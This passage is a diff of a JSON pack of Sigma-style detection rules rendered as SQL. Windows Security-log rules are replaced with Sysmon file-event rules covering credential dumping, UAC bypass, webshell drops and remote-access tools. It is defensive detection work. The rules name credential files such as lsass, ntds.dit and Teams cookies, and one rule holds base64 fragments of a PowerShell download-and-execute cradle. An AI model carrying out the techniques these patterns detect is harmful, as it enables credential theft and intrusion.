TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Unauthorized System Time Modification", - "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "status": "test", - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "author": "@neu5ron", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + "Legitimate administrative use" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" ], - "filename": "win_security_susp_time_modification.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - "title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "Access to ADMIN$ Share", - "id": "098d7118-55bc-4912-a836-dc6483a8d150", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to $ADMIN share", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_admin_share_access.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", "tags": [ + "attack.t1055", + "attack.t1218", "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1548.002" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", - "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "status": "experimental", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", "attack.command_and_control", - "attack.t1071.004" + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Locked Workstation", - "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "status": "stable", - "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "author": "Alexandr Yampolskyi, SOC Prime", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_workstation_was_locked.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "Group Modification Logging", - "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "status": "stable", - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", - "author": "Alexandr Yampolskyi, SOC Prime", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_group_modification_logging.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "AD User Enumeration", - "id": "ab6bffca-beff-4baa-af11-6733f296d57a", - "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ - "Administrators configuring new users." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger this" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + 